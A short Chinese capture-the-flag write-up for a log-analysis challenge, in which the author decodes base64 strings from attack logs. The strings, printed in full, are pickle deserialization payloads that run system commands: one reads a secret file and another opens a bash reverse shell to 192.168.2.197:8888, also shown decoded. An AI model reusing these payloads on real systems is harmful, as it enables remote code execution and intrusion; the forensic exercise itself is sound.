0x01 题目介绍

(简单的日志分析)某应用程序被攻击,请分析日志后作答:

附件:简单日志分析.zip

  1. 黑客攻击的参数是user。(如有字母请全部使用小写)
    2. 黑客查看的秘密文件的绝对路径是/Th4s_IS_VERY_Import_Fi1e
    3. 黑客反弹shell的ip和端口是192.168.2.197:8888。(格式使用“ip:端口”,例如127.0.0.1:2333)

    0x02 解题思路

    这道比较简单
    打开后,发现很少大部分是404,直接往下拉就行
    发现一串不是404的,base64解码,执行系统命令,所以第一题攻击参数就是user
    image.pngimage.png

继续往下拉,发现另一串base编码的字符STAKcDAKMFMnY2F0IC9UaDRzX0lTX1ZFUllfSW1wb3J0X0ZpMWUnCnAxCjAoZzAKbHAyCjAoSTAKdHAzCjAoZzMKSTAKZHA0CjBjb3MKc3lzdGVtCnA1CjBnNQooZzEKdFIu解码后执行 cat /Th4s_IS_VERY_Import_Fi1e,第二题答案就出来了

image.png
拉倒最下面,继续解码STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4=
bash -i >& /dev/tcp/192.168.2.197/8888 0>&1 第三题也就出来了
image.png